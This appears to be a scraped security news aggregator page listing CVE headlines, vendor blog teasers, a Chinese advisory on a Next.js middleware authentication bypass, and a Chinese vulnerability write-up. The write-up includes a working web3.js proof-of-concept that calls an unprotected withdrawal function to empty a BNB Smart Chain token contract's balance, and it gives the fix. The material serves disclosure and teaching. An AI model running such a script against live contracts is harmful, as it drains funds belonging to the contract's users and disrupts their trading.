Aggregator
CVE-1999-0117 | IBM AIX 3.1/3.2 passwd privileges management
CVE-1999-1119 | IBM AIX up to 3.2.5 Anonymous FTP privileges management (XFDB-3154 / BID-41)
CVE-1999-1142 | Sun SunOS 4.1.2 Sendmail Environment Variable privileges management (CA-1992-11 / XFDB-3152)
CVE-1999-0168 | Sun SunOS 4.1.3/4.1.3c Portmapper privileges management (Nessus ID 11358 / XFDB-80)
New UI for NSFOCUS WAF V6.0R09F00 – Experience a Smoother Site Management
NSFOCUS understands that the Security Operations team is facing increasing threats to their web applications and workloads are rising accordingly, a simple yet easy-to-use WAF has become more important than ever for effective Security Operations. The upcoming NSFOCUS Web Application Firewall (WAF) V6.0R09F00 (hereafter called as 6090) not only comprehensively reconstructs the architecture but also […]
The post New UI for NSFOCUS WAF V6.0R09F00 – Experience a Smoother Site Management appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..
The post New UI for NSFOCUS WAF V6.0R09F00 – Experience a Smoother Site Management appeared first on Security Boulevard.
Review: Zero to Engineer
Zero to Engineer is a practical guide for anyone looking to launch a career in information technology without a traditional college degree. The book draws from the author’s unlikely journey – from being expelled from high school to earning six figures in the tech industry. About the author Terry Kim brings more than two decades of experience in the IT industry, with a career that includes roles at major technology companies such as Cisco Systems … More →
The post Review: Zero to Engineer appeared first on Help Net Security.
CVE-2000-0552 | Mirabilis ICQ 2000.0a Webmail Client information disclosure (EDB-19993 / Nessus ID 11572)
AI图像平台GenNomis泄露47GB未成年人深度伪造内容
CVE-2024-3192 | MailCleaner up to 2023.03.14 Admin Interface Mail Message cross site scripting (MZ-24-01)
CVE-2024-3193 | MailCleaner up to 2023.03.14 Admin Endpoints os command injection (MZ-24-01)
CVE-2024-3194 | MailCleaner up to 2023.03.14 Log File Endpoint cross site scripting (MZ-24-01)
CVE-2024-4302 | Super 8 Livechat SDK up to 4.5.0 Chat Box cross site scripting
CVE-2024-33632 | Piotnet Addons for Elementor Pro Plugin up to 7.1.17 on WordPress cross-site request forgery
CVE-2024-33681 | Sandor Kovacs Regenerate Post Permalink Plugin up to 1.0.3 on WordPress cross-site request forgery
CVE-2024-1905 | Smart Forms Plugin up to 2.6.95 on WordPress Setting cross site scripting
An Update on QuickShell: Sharing Is Caring about an RCE Attack Chain on Quick Share
See how a SafeBreach Labs researcher discovered a bypass for a fix to a critical vulnerability they previously reported in Google’s Quick Share data transfer utility.
The post An Update on QuickShell: Sharing Is Caring about an RCE Attack Chain on Quick Share appeared first on SafeBreach.
The post An Update on QuickShell: Sharing Is Caring about an RCE Attack Chain on Quick Share appeared first on Security Boulevard.
JVN: WinRARにおけるシンボリックリンクベースの「Mark of the Web」チェックバイパスの脆弱性
漏洞预警 | Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927)
1、漏洞概述
近日,vercel发布更新修复Next.js中间件鉴权绕过漏洞(CVE-2025-29927),建议您及时开展安全风险自查。
据描述,由于 next.js应用程序使用中间件时,其函数调用 runMiddleware 会识别x-middle-subrequest请求头,用以识别是否应用了中间件,如果其值是中间所在路径,则可以完全绕过鉴权。攻击者可以利用该漏洞获取服务器敏感信息。如果站点具有缓存/CDN 系统,则可能会强制缓存 404 响应,从而使其页面不可用,严重影响其可用性 。
漏洞影响的产品和版本:
11.1.4 <= next.js <= 13.5.6
14.0.0 <= next.js <= 14.2.24
15.0.0 <= next.js <= 15.2.2
2、漏洞复现
3、资产测绘
据daydaymap数据显示互联网存在2,864,117个资产,国内风险资产分布情况如下:
4、解决方案
临时缓解方案:
部署针对项目的监控系统:阻止包含 x-middleware-subrequest 标头的外部用户请求到达您的 Next.js 应用程序。
升级修复:
目前官方已发布修复安全补丁
https://github.com/vercel/next.js/releases/tag/v14.2.25
5、参考链接
https://www.ddpoc.com/DVB-2023-9004.html
某合约任意提取BNB漏洞
1、背景描述
合约是一个在满足特定条件时在区块链上执行代码的程序,各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。
存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融(DeFi)的创新项目,旨在通过趣味性和实用性打破传统Meme代币的模式。
该合约的代币目前市值1400K(USDT),日均交易量150K(USDT)
2、问题描述
该合约“withdrawStuckBNB”函数没有添加权限控制,攻击者可以通过调用“withdrawStuckBNB”函数,将合约内所有BNB转至营销地址“marketingAddress”,从而导致合约交易异常。
tips:
BNB是BNB链生态系统的原生代币,该系统包含BNB智能链(BSC)和BNB信标链。在BNB智能链上,BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币,使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。
BNB在这个合约中的作用包括:作为交易对的配对货币,用于支付交易手续费,流动性池的组成部分,以及手续费收入的分配媒介
3、问题代码分析
```solidity
function withdrawStuckBNB() external {
bool success;
(success,) = address(marketingAddress).call{value: address(this).balance}("");
}
```
在合约代码里面可以看到,`withdrawStuckBNB` 没有添加onlyOwner修饰,只有external修饰
tips:
Solidity语法中有4中默认函数修饰符
- public:最大访问权限,任何人都可以调用。
- private:只有合约内部可以调用,不可以被继承。
- internal:子合约可以继承和调用。
- external:外部可以调用,子合约可以继承和调用,当前合约不可以调用。
onlyOwner是该合约自定义一个修饰器,用于修饰函数,只有合约的所有者才能调用该函数。
这就意味着任何人都可以调用这个函数,将合约内所有BNB转至营销地址,导致资金被盗。
4、后续利用链分析
从问题代码可知,任何人都可以调用这个函数,将合约内所有BNB转至营销地址marketingAddress
查看marketingAddress的代码,marketingAddress是一个营销地址,更新marketingAddress的代码如下:
可以看到,updateMarketingAddress函数存在onlyOwner修饰,只有owner可以调用这个函数,这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止,攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress,但是marketingAddress本身只能由owner更新,所以攻击者无法更新marketingAddress的地址,从而无法将BNB转至攻击者的地址,但是漏洞也能造成合约内BNB的清空,影响合约运行。
5、构造POC
```javascriptconst Web3 = require('web3');// // 初始化 Web3 实例,这里使用测试网的地址,你可以根据实际情况修改const web3 = new Web3('https://data-seed-prebsc-1-s1.binance.org:8545');// const web3 = new Web3('https://bsc-dataseed4.binance.org/');
const contractABI = ["""换成完整ABI"""];const contractAddress = "0xaaaaa"; // 替换为目标合约地址const contract = new web3.eth.Contract(contractABI, contractAddress);console.log("connect success");
// 如果使用 Node.js,需要添加私钥const privateKey = '0xbbbbbbbbbbbbbb'; // 替换为你的私钥const account = web3.eth.accounts.privateKeyToAccount(privateKey);web3.eth.accounts.wallet.add(account);
async function withdrawBNB() { try{ console.log(account.address); const tx = { from: account.address, // 必须使用真实地址 to: contractAddress, gas: 300000, data: contract.methods.withdrawStuckBNB().encodeABI() };
// 估算 gas const gas = await web3.eth.estimateGas(tx); tx.gas = gas;
// 获取当前 gasPrice const gasPrice = await web3.eth.getGasPrice(); tx.gasPrice = gasPrice;
// 签名并发送交易(Node.js 方式) const signedTx = await web3.eth.accounts.signTransaction(tx, privateKey); const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);
console.log('Transaction Hash:', receipt.transactionHash); console.log('Receipt:', receipt); } catch (error) { console.error("Error:", error); } console.log("2");}
withdrawBNB();console.log("3");```
6、修复方案
在withdrawStuckBNB函数中添加onlyOwner修饰,只允许owner可以调用这个函数
```solidity
function withdrawStuckBNB() external onlyOwner {
(bool success,) = marketingAddress.call{value: address(this).balance}("");
require(success, "Transfer failed");
}
```
该漏洞目前已向相关单位和厂商报送并已推出补丁,使用此漏洞造成的任何攻击影响均与本文作者无关。